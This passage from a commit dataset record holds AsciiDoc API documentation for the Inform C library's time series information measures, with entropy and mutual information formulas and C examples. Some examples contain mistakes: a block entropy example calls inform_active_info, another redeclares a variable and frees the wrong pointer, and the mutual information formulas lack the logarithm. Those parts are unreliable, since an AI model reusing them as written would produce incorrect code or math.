*xs, int const *ys,\n size_t n, int b, double *re, inform_error *err);\n----\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[10] = {0,1,0,0,0,0,0,0,0,1};\nint const ys[10] = {0,1,1,1,1,0,0,1,0,0};\n\ndouble *re = inform_local_relative_entropy(xs, ys, 10, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ re ~ { 0.678, -1.322, 0.678, 0.678, 0.678, 0.678, 0.678,\n\/\/ 0.678, 0.678, -1.322 };\n\ninform_local_relative_entropy(ys, xs, 10, 2, re, &err);\nassert(inform_succeeded(&err));\n\/\/ re ~ { -0.678, 1.322, 1.322, 1.322, 1.322, -0.678, -0.678, 1.322,\n\/\/ -0.678, -0.678 }\n\nfree(re);\n----\n****\n\n[[separable-information]]\n== Separable Information\n\n****\n[[inform_separable_info]]\n[source,c]\n----\ndouble inform_separable_info(int const *srcs, int const *dest,\n size_t l, size_t n, size_t m, int b, size_t k,\n inform_error *err);\n----\n****\n\n****\n[[inform_local_separable_info]]\n[source,c]\n----\ndouble *inform_local_separable_info(int const *srcs, int const *dest,\n size_t l, size_t n, size_t m, int b, size_t k, double *si,\n inform_error *err);\n----\n****\n\n[[transfer-entropy]]\n== Transfer Entropy\n\n****\n[[inform_transfer_entropy]]\n[source,c]\n----\ndouble inform_transfer_entropy(int const *src, int const *dst,\n int const *back, size_t l, size_t n, size_t m, int b, size_t k,\n inform_error *err);\n----\n****\n\n****\n[[inform_local_transfer_entropy]]\n[source,c]\n----\ndouble *inform_local_transfer_entropy(int const *src, int const *dst,\n int const *back, size_t l, size_t n, size_t m, int b, size_t k,\n double *te, inform_error *err);\n----\n****\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"9c24fd3007a279f3ce7bc1a32c177a01da0f75bd","subject":"Add header information to time series measures","message":"Add header information to time series measures\n","repos":"ELIFE-ASU\/Inform,dglmoore\/Inform,ELIFE-ASU\/Inform,dglmoore\/Inform","old_file":"docs\/timeseries.adoc","new_file":"docs\/timeseries.adoc","new_contents":"[[time-series-measures]]\n= Time Series Measures\n\nThe original purpose of *Inform* was to analyze time series data. This explains why most of\n*Inform*'s functionality resides in functions specifically optimized for analyzing time\nseries. The API was designed to be easy to use in C or {cpp}, or to be wrapped in a\nhigher-level language, e.g. https:\/\/elife-asu.github.io\/PyInform[Python]. This means that we\navoided some of the \"niceties\" of C, such as extensive use of macros and other generic\natrocities, in favor of wrappability. Keep this in mind as you learn the API.\n\nMany information measures have \"local\" variants which compute a time series of point-wise\nvalues. These local variants have names similar to their averaged or global counterparts,\ne.g <<inform_active_info,inform_active_info>> and\n<<inform_local_active_info,inform_local_active_info>>. We have been meticulous in ensuring\nthat function and parameter names are consistent across measures. If you notice some\ninconsistency, please https:\/\/github.com\/elife-asu\/inform\/issue[report it as an issue].\n\n[[time-series-notation]]\n== Notation\n\nThroughout the discussion of time series measures, we will try to use a consistent notation.\nWe will denote random variables as stem:[X,Y,\\ldots], and let stem:[x_i,y_i,\\ldots]\nrepresent the stem:[i]-th time step of a time series drawn from the associated random\nvariable. Many of the measures consider stem:[k]-histories (a.k.a stem:[k]-blocks) of the\ntime series, e.g. stem:[x_i^{(k)} = \\left\\{x_{i-k+1}, x_{i-k+2},\\ldots,x_i\\right\\}].\n\nWhen denoting probability distributions, we will only make the random variable explicit in\nsituations where the notation is ambiguous. We will typically write stem:[p(x_i)],\nstem:[p(x_i^{(k)})], and stem:[p(x_i^{(k)}, x_{i+1})] to denote the empirical probability\nof observing the stem:[x_i] state, the stem:[x_i^{(k)}] stem:[k]-history, and the joint\nprobability of observing stem:[\\left(x_i^{(k)}, x_{i+1}\\right)].\n\n*Please report any notational ambiguities as an\nhttps:\/\/github.com\/elife-asu\/inform\/issue[issue].*\n\n[[time-series-detail]]\n== Implementation Details\n\n=== The Base: States and Logarithms\nThe word \"base\" has two different meanings in the context of information measures on time\nseries. It could refer to the base of the time series itself, that is the number of unique\nstates in the time series. For example, the time series stem:[\\{0,2,1,0,0\\}] is a base-3\ntime series. On the other hand, it could refer to the base of the logarithm used in\ncomputing the information content of the inferred probability distributions. The problem is\nthat these two meanings clash. The base of the time series affects the range of values the\nmeasure can produce, and the base of the logarithm represents a rescaling of those values.\n\nIn this library we deal with this by *always* using base-2 logarithms, and having the user\nspecify the base of the time series \u2014 don't worry, we <<error-handling, set an error>> if\nthe provided base doesn't make sense. All of this ensures that the library is a simple as\nreasonably possible.\n\n=== Multiple Initial Conditions\nYou generally need *a lot* of data to infer a probability distribution. An experimentalist\nor simulator might then collect data over multiple trials or initial conditions. Most of\n*Inform*'s time series measures allow the user to pass in a two-dimensional, rectangular\narray which each row representing a time series from a different initial condition. From\nthis the probability distributions are inferred, and the desired value is calculated. This\nhas the downside of requiring that the user store all of the data in memory, but it has the\nadvantage of being fast and simple. Trade-offs, man...\n\nA subsequent release, https:\/\/github.com\/elife-asu\/inform\/milestone\/3[likely v1.1.0], will\nallows the initial conditions to have time series of different lengths and will provide\naccumulator implementations of all of these measures that will let the incrementally\nconstruct the distributions. This will lift some of the memory burden at the expense of\nruntime performance.\n\n=== Calling Conventions\nAll of the of the time series functions described in this section use the same basic calling\nconventions and use the same (or similar) argument names were possible.\n\n|===\n| Argument Name | Description\n\n| `series`\n| A 2-D or 3-D, finite-state time series in contiguous, row-major form\n\n| `l`\n| The number of \"sources\" or variables in a 3-D time series\n\n| `n`\n| The number of initial conditions per \"source\"\n\n| `m`\n| The number of time steps per \"source\"\n\n| `b`\n| The base of the time series\n\n| `k`\n| The length history length\n\n| `err`\n| An error argument\n|===\n\nAverage measures generally return a double-precision, floating-point value while local\nvariants return a pointer to an appropriately shaped, contiguous array. Local measures\naccept an argument, often named after the function (e.g. local active information takes an\n`ai` argument), which is used to store the computed local values. If that argument is NULL,\nthen the function allocates an array.\n\nWe will try to note any deviations from these conventions.\n\n[[active-info]]\n== Active Information\n\nActive information (AI) was introduced in <<Lizier2012>> to quantify information storage in\ndistributed computations. Active information is defined in terms of a temporally local\nvariant\n\n[stem]\n++++\na_{X,i}(k) = \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})p(x_{i+1})}}.\n++++\n\nwhere the probabilities are constructed empirically from the _entire_ time series. From the\nlocal variant, the temporally global active information is defined as\n\n[stem]\n++++\nA_X(k) = \\langle a_{X,i}(k) \\rangle_i\n = \\sum_{x_i^{(k)},x_{i+1}} p(x_i^{(k)},x_{i+1}) \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})p(x_{i+1})}}.\n++++\n\nStrictly speaking, the local and average active information are defined as\n\n[stem]\n++++\na_{X,i} = \\lim_{k\\rightarrow \\infty}a_{X,i}(k)\n\\qquad \\textrm{and} \\qquad\nA_X = \\lim_{k\\rightarrow \\infty}A_X(k),\n++++\n\nbut we do not provide limiting functionality in this library\n(https:\/\/github.com\/elife-asu\/issues\/24[yet]!).\n\n****\n[[inform_active_info]]\n[source,c]\n----\ndouble inform_active_info(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average active information with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble ai = inform_active_info(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ 0.305958\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble ai = inform_active_info(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ 0.359879\n----\n[horizontal]\nHeader:: `inform\/active_info.h`\n****\n\n****\n[[inform_local_active_info]]\n[source,c]\n----\ndouble *inform_local_active_info(int const *series, size_t n, size_t m,\n int b, size_t k, double *ai, inform_error *err);\n----\nCompute the local active information with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble *ai = inform_local_active_info(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ {-0.193, 0.807, 0.222, 0.222, -0.363, 1.222, 0.222}\nfree(ai);\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble ai[14];\ninform_local_active_info(series, 2, 9, 2, 2, ai, &err);\nassert(inform_succeeded(&err));\n\/\/ ai ~ { 0.807, -0.363, 0.637, 0.637, -0.778, 0.807, -1.193,\n\/\/ 0.807, 0.807, 0.222, 0.807, 0.807, 0.222, 0.807 }\n\n\/\/ no need to free since `ai` was statically allocated in this scope\n\/\/ free(ai);\n----\n[horizontal]\nHeader:: `inform\/active_info.h`\n****\n\n[[block-entropy]]\n== Block Entropy\nBlock entropy, also known as stem:[N]-gram entropy <<Shannon1948>>, is the standard Shannon\nentropy of the stem:[k]-histories of a time series:\n[stem]\n++++\nH(X^{(k)}) = -\\sum_{x_i^{(k)}} p(x_i^{(k)}) \\log_2{p(x_i^{(k)})}\n++++\nwhich reduces to the traditional Shannon entropy for stem:[k=1].\n\n****\n[[inform_block_entropy]]\n[source,c]\n----\ndouble inform_block_entropy(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average block entropy of a time series with block size `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\n\n\/\/ k = 1\ndouble h = inform_block_entropy(series, 1, 9, 2, 1, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 0.991076\n\n\/\/ k = 2\nh = inform_block_entropy(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 1.811278\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble h = inform_active_info(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ 1.936278\n----\n[horizontal]\nHeader:: `inform\/block_entropy.h`\n****\n\n****\n[[inform_local_block_entropy]]\n[source,c]\n----\ndouble *inform_local_block_entropy(int const *series, size_t n,\n size_t m, int b, size_t k, double *ent, inform_error *err);\n----\nCompute the local block entropy of a time series with block size `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\n\n\/\/ k == 1\ndouble *h = inform_local_block_entropy(series, 1, 9, 2, 1, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 0.848, 0.848, 1.170, 1.170, 1.170, 1.170, 0.848, 0.848, 0.848 }\n\n\/\/ k == 2\ndouble *h = inform_local_block_entropy(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 1.415, 3.000, 1.415, 1.415, 1.415, 3.000, 1.415, 1.415 }\n\nfree(ai);\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble h[16];\ninform_local_block_entropy(series, 2, 9, 2, 2, h, &err);\nassert(inform_succeeded(&err));\n\/\/ h ~ { 1.415, 2.415, 2.415, 2.415, 2.415, 2.000, 1.415, 1.415,\n\/\/ 2.000, 1.415, 2.415, 2.000, 1.415, 2.415, 2.000, 1.415 }\n\n\/\/ no need to free since `h` was statically allocated in this scope\n\/\/ free(h);\n----\n[horizontal]\nHeader:: `inform\/block_entropy.h`\n****\n\n[[conditional-entropy]]\n== Conditional Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Conditional_entropy[Conditional entropy] is a measure of the\namount of information required to describe a random variable stem:[Y] given knowledge of\nanother random variable stem:[X]. When applied to time series, two time series are used to\nconstruct the empirical distributions, and <<inform_shannon_ce,inform_shannon_ce>> can be\napplied to yield\n[stem]\n++++\nH(Y|X) = - \\sum_{x_i,y_i} p(x_i,y_i) \\log_2{p(y_i|x_i)}.\n++++\nThis can be viewed as the time-average of the local conditional entropy\n[stem]\n++++\nh_i(Y|X) = -\\log_2{p(y_i|x_i)}.\n++++\nSee <<Cover1991>> for more information.\n\n****\n[[inform_conditional_entropy]]\n[source,c]\n----\ndouble inform_conditional_entropy(int const *xs, int const *ys,\n size_t n, int bx, int by, inform_error *err);\n----\nCompute the conditional entropy between two time series.\n\nThis function expects the *condition* to be the first argument, `xs`. It is expected that\neach time series be the same length `n`, but may have different bases `bx` and `by`.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[20] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1};\nint const ys[20] = {0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1};\n\ndouble ce = inform_conditional_entropy(xs, ys, 20, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 0.597107\n\nce = inform_conditional_entropy(ys, xs, 20, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 0.507757\n----\n[horizontal]\nHeader:: `inform\/conditional_entropy.h`\n****\n\n****\n[[inform_local_conditional_entropy]]\n[source,c]\n----\ndouble *inform_local_conditional_entropy(int const *xs, int const *ys,\n size_t n, int bx, int by, double *mi, inform_error *err);\n----\nCompute the local conditional entropy between two time series.\n\nThis function expects the *condition* to be the first argument, `xs`. It is expected that\neach time series be the same length `n`, but may have different bases `bx` and `by`.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[20] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1};\nint const ys[20] = {0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1};\n\ndouble *ce = inform_local_conditional_entropy(xs, ys, 20, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == { 3.00, 3.00, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.19,\n\/\/ 0.19, 0.19, 0.19, 0.19, 0.19, 0.19, 0.42, 0.42, 0.42, 2.00 }\n\ninform_local_conditional_entropy(ys, xs, 20, 2, 2, ce, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == { 1.32, 1.32, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10,\n\/\/ 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.74, 0.74, 0.74, 3.91 }\n\nfree(ce);\n----\n[horizontal]\nHeader:: `inform\/conditional_entropy.h`\n****\n\n[[cross-entropy]]\n== Cross Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Cross_entropy[Cross entropy] between two distributions\nstem:[p_X] and stem:[q_X] measures the amount of information needed to identify events\nusing a coding scheme optimized for stem:[q_X] when stem:[p_X] is the \"real\" distributions\nover stem:[X].\n[stem]\n++++\nH(p,q) = -\\sum_{x} p(x) \\log_2{q(x)}\n++++\nCross entropy's local variant is equivalent to the self-information of stem:[q_X], and as\nsuch is implemented by <<inform_local_block_entropy,inform_local_block_entropy>>.\n\nSee <<Cover1991>> for more details.\n****\n[[inform_cross_entropy]]\n[source,c]\n----\ndouble inform_cross_entropy(int const *ps, int const *qs, size_t n,\n int b, inform_error *err);\n----\nCompute the cross entropy between the \"true\" and \"unnatural\" distributions stem:[p_X] and\nstem:[q_X] from associated time series `ps` and `qs`, respectively.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const ps[10] = {0,1,1,0,1,0,0,1,0,0};\nint const qs[10] = {0,0,0,0,0,1,1,0,0,1};\n\ndouble ce = inform_cross_entropy(ps, qs, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 1.003530\n\nce = inform_cross_entropy(qs, ps, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ ce == 0.912454\n----\n[horizontal]\nHeader:: `inform\/cross_entropy.h`\n****\n\n[[effective-information]]\n== Effective Information\n\n****\n[[inform_effective_info]]\n[source,c]\n----\ndouble inform_effective_info(double const *tpm, double const *inter,\n size_t n, inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/effective_info.h`\n****\n\n[[entropy-rate]]\n== Entropy Rate\nhttps:\/\/en.wikipedia.org\/wiki\/Entropy_rate[Entropy rate] quantifies the amount of\ninformation needed to describe the next state of stem:[X] given observations of\nstem:[X^{(k)}]. In other wrods, it is the entropy of the time series conditioned on the\nstem:[k]-histories. The local entropy rate\n[stem]\n++++\nh_{X,i}(k) = \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})}}.\n++++\ncan be averaged to obtain the global entropy rate\n[stem]\n++++\nH_X(k) = \\langle h_{X,i}(k) \\rangle_i\n = \\sum_{x_i^{(k)},x_{i+1}} p(x_i^{(k)},x_{i+1}) \\log_2{\\frac{p(x_i^{(k)}, x_{i+1})}{p(x_i^{(k)})}}.\n++++\nMuch as with <<active-info, active information>>, the local and average entropy rates are\nformally obtained in the limit\n[stem]\n++++\nh_{X,i} = \\lim_{k\\rightarrow \\infty}h_{X,i}(k)\n\\qquad \\textrm{and} \\qquad\nH_X = \\lim_{k\\rightarrow \\infty}H_X(k),\n++++\n\nbut we do not provide limiting functionality in this library\n(https:\/\/github.com\/elife-asu\/issues\/24[yet]!).\n\nSee <<Cover1991>> for more details.\n\n****\n[[inform_entropy_rate]]\n[source,c]\n----\ndouble inform_entropy_rate(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\nCompute the average entropy rate with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble er = inform_entropy_rate(series, 1, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ 0.679270\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble er = inform_entropy_rate(series, 2, 9, 2, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ 0.625349\n----\n[horizontal]\nHeader:: `inform\/entropy_rate.h`\n****\n\n****\n[[inform_local_entropy_rate]]\n[source,c]\n----\ndouble *inform_local_entropy_rate(int const *series, size_t n,\n size_t m, int b, size_t k, double *er, inform_error *err);\n----\nCompute the local entropy rate with a history length `k`.\n\n*Examples:*\n\nOne initial condition:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[9] = {0,0,1,1,1,1,0,0,0};\ndouble *er = inform_local_entropy_rate(series, 1, 9, 2, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ { 1.000, 0.000, 0.585, 0.585, 1.585, 0.000, 1.000 }\nfree(er);\n----\n\nTwo initial conditions:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const series[18] = {0,0,1,1,1,1,0,0,0,\n 1,0,0,1,0,0,1,0,0};\ndouble er[14];\ninform_local_entropy_rate(series, 2, 9, 2, 2, er, &err);\nassert(inform_succeeded(&err));\n\/\/ er ~ { 0.415, 1.585, 0.585, 0.585, 1.585, 0.000, 2.000,\n\/\/ 0.000, 0.415, 0.585, 0.000, 0.415, 0.585, 0.000 }\n\n\/\/ no need to free since `er` was statically allocated in this scope\n\/\/ free(er);\n----\n[horizontal]\nHeader:: `inform\/entropy_rate.h`\n****\n\n[[excess-entropy]]\n== Excess Entropy\n\n****\n[[inform_excess_entropy]]\n[source,c]\n----\ndouble inform_excess_entropy(int const *series, size_t n, size_t m,\n int b, size_t k, inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/excess_entropy.h`\n****\n\n****\n[[inform_local_excess_entropy]]\n[source,c]\n----\ndouble *inform_local_excess_entropy(int const *series, size_t n,\n size_t m, int b, size_t k, double *ee, inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/excess_entropy.h`\n****\n\n[[information-flow]]\n== Information Flow\n\n****\n[[inform_information_flow]]\n[source,c]\n----\ndouble inform_information_flow(int const *src, int const *dst,\n int const *back, size_t l_src, size_t l_dst, size_t l_back,\n size_t n, size_t m, int b, inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/information_flow.h`\n****\n\n[[evidence-of-integration]]\n== Evidence Of Integration\n\n****\n[[inform_integration_evidence]]\n[source,c]\n----\ndouble *inform_integration_evidence(int const *series, size_t l,\n size_t n, int const *b, double *evidence, inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/information_flow.h`\n****\n\n****\n[[inform_integration_evidence_part]]\n[source,c]\n----\ndouble *inform_integration_evidence_part(int const *series, size_t l,\n size_t n, int const *b, size_t const *parts, size_t nparts,\n double *evidence, inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/information_flow.h`\n****\n\n[[mutual-information]]\n== Mutual Information\nhttps:\/\/en.wikipedia.org\/wiki\/Mutual_information[Mutual information] (MI) is a measure of\nthe amount of mutual dependence between at least two random variables. Locally, MI is\ndefined as\n[stem]\n++++\ni_i(X_1,\\ldots,X_l) = \\frac{p(x_{1,i},\\ldots,x_{l,i})}{p(x_{1,i})\\ldots p(x_{l,i})}.\n++++\nThe mutual information is then just the time average of stem:[i_i(X_1,\\ldots,X_l)]:\n[stem]\n++++\nI(X_1,\\ldots,X_l) =\n \\sum_{x_{1,i},\\ldots,x_{l,i}} p(x_{1,i},\\ldots,x_{l,i}) \\frac{p(x_{1,i},\\ldots,x_{l,i})}{p(x_{1,i})\\ldots p(x_{l,i})}.\n++++\nSee <<Cover1991>> for more details.\n\n****\n[[inform_mutual_info]]\n[source,c]\n----\ndouble inform_mutual_info(int const *series, size_t l, size_t n,\n int const *b, inform_error *err);\n----\nCompute the mutual information between two or more time series.\n\nFor this function, `l` is the number of random variables, and `n` is the length of each\nvariable's time series. Each variable can have a different base, so `b` is an array of\nlength `l`.\n\n*Examples:*\n\nTwo variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[40] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1 \/\/ var 2};\n\ndouble mi = inform_mutual_info(xs, 2, 20, (int[2]){2,2}, &err);\nassert(inform_succeeded(&err));\n\/\/ mi == 0.214171\n----\n\nThree variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[60] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1, \/\/ var 2\n 1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 3};\n\ndouble mi = inform_mutual_info(xs, 3, 20, (int[3]){2,2,2}, &err);\nassert(inform_succeeded(&err));\n\/\/ mi == 1.095462\n----\n[horizontal]\nHeader:: `inform\/mutual_info.h`\n****\n\n****\n[[inform_local_mutual_info]]\n[source,c]\n----\ndouble *inform_local_mutual_info(int const *series, size_t l, size_t n,\n int const *b, double *mi, inform_error *err);\n----\nCompute the local mutual information between two or more time series.\n\nFor this function, `l` is the number of random variables, and `n` is the length of each\nvariable's time series. Each variable can have a different base, so `b` is an array of\nlength `l`.\n\n*Examples:*\n\nTwo variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[40] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1 \/\/ var 2};\n\ndouble *mi = inform_local_mutual_info(xs, 2, 20, (int[2]){2,2}, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ mi ~ { -1.000, -1.000, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222,\n\/\/ 0.222, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222, 0.222,\n\/\/ 1.585, 1.585, 1.585, -1.585 }\nfree(mi);\n----\n\nThree variables:\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[60] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 1\n 0,0,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,0,0,1, \/\/ var 2\n 1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,1,1,1, \/\/ var 3};\n\n\ndouble *mi = inform_local_mutual_info(xs, 3, 20, (int[3]){2,2,2}, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ mi ~ { 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737,\n\/\/ 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737, 0.737,\n\/\/ 3.322, 3.322, 0.322, 0.152 }\nfree(mi);\n----\n[horizontal]\nHeader:: `inform\/mutual_info.h`\n****\n\n[[partial-information-decomposition]]\n== Partial Information Decomposition\n\n****\n[[inform_pid_source]]\n[source,c]\n----\ntypedef struct inform_pid_source\n{\n size_t *name;\n struct inform_pid_source **above;\n struct inform_pid_source **below;\n size_t size, n_above, n_below;\n double imin;\n double pi;\n} inform_pid_source;\n----\n[horizontal]\nHeader:: `inform\/pid.h`\n****\n\n****\n[[inform_pid_lattice]]\n[source,c]\n----\ntypedef struct inform_pid_lattice\n{\n inform_pid_source **sources;\n inform_pid_source *top;\n inform_pid_source *bottom;\n size_t size;\n} inform_pid_lattice;\n----\n[horizontal]\nHeader:: `inform\/pid.h`\n****\n\n****\n[[inform_pid_lattice_free]]\n[source,c]\n----\nvoid inform_pid_lattice_free(inform_pid_lattice *l);\n----\n[horizontal]\nHeader:: `inform\/pid.h`\n****\n\n****\n[[inform_pid]]\n[source,c]\n----\ninform_pid_lattice *inform_pid(int const *stimulus,\n int const *responses, size_t l, size_t n, int bs,\n int const *br, inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/pid.h`\n****\n\n[[predictive-information]]\n== Predictive Information\n\n****\n[[inform_predictive_info]]\n[source,c]\n----\ndouble inform_predictive_info(int const *series, size_t n, size_t m,\n int b, size_t kpast, size_t kfuture, inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/predictive_info.h`\n****\n\n****\n[[inform_local_predictive_info]]\n[source,c]\n----\ndouble *inform_local_predictive_info(int const *series, size_t n,\n size_t m, int b, size_t kpast, size_t kfuture, double *pi,\n inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/predictive_info.h`\n****\n\n[[relative-entropy]]\n== Relative Entropy\nhttps:\/\/en.wikipedia.org\/wiki\/Kullback%E2%80%93Leibler_divergence[Relative entropy], also\nknown as the Kullback-Leibler divergence, measures the amount of information gained in\nswitching from a prior distribution stem:[q_X] to a posterior distribution stem:[p_X] over\n_the same support_:\n[stem]\n++++\nD_{KL}(p||q) = \\sum_{x_i} p(x_i) \\log_2{\\frac{p(x_i)}{q(x_i)}}.\n++++\nThe local counterpart is\n[stem]\n++++\nd_{KL,i}(p||q) = log_2{\\frac{p(x_i)}{q(x_i)}}.\n++++\nNote that the average in moving from the local to the non-local relative entropy is taken\nover the posterior distribution.\n\nSee <<Kullback1951>> and <<Cover1991>> for more information.\n\n****\n[[inform_relative_entropy]]\n[source,c]\n----\ndouble inform_relative_entropy(int const *xs, int const *ys, size_t n,\n int b, inform_error *err);\n----\nCompute the relative entropy between time series drawn from posterior and prior\ndistributions, here `xs` and `ys` respectively.\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[10] = {0,1,0,0,0,0,0,0,0,1};\nint const ys[10] = {0,1,1,1,1,0,0,1,0,0};\n\ndouble re = inform_relative_entropy(xs, ys, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ re == 0.278072\n\nre = inform_relative_entropy(ys, xs, 10, 2, &err);\nassert(inform_succeeded(&err));\n\/\/ re == 0.321928\n----\n[horizontal]\nHeader:: `inform\/relative_entropy.h`\n****\n\n****\n[[inform_local_relative_entropy]]\n[source,c]\n----\ndouble *inform_local_relative_entropy(int const *xs, int const *ys,\n size_t n, int b, double *re, inform_error *err);\n----\n\n*Examples:*\n[source,c]\n----\ninform_error err = INFORM_SUCCESS;\nint const xs[10] = {0,1,0,0,0,0,0,0,0,1};\nint const ys[10] = {0,1,1,1,1,0,0,1,0,0};\n\ndouble *re = inform_local_relative_entropy(xs, ys, 10, 2, NULL, &err);\nassert(inform_succeeded(&err));\n\/\/ re ~ { 0.678, -1.322, 0.678, 0.678, 0.678, 0.678, 0.678,\n\/\/ 0.678, 0.678, -1.322 };\n\ninform_local_relative_entropy(ys, xs, 10, 2, re, &err);\nassert(inform_succeeded(&err));\n\/\/ re ~ { -0.678, 1.322, 1.322, 1.322, 1.322, -0.678, -0.678, 1.322,\n\/\/ -0.678, -0.678 }\n\nfree(re);\n----\n[horizontal]\nHeader:: `inform\/relative_entropy.h`\n****\n\n[[separable-information]]\n== Separable Information\n\n****\n[[inform_separable_info]]\n[source,c]\n----\ndouble inform_separable_info(int const *srcs, int const *dest,\n size_t l, size_t n, size_t m, int b, size_t k,\n inform_error *err);\n----\n[horizontal]\nHeader:: `inform\/separable_info.h`\n****\n\n****\n[[inform_local_separable_info]]\n[source,c]\n----\ndouble *inform_local_separable_info(int const *srcs, int const *dest,\n size_t l, 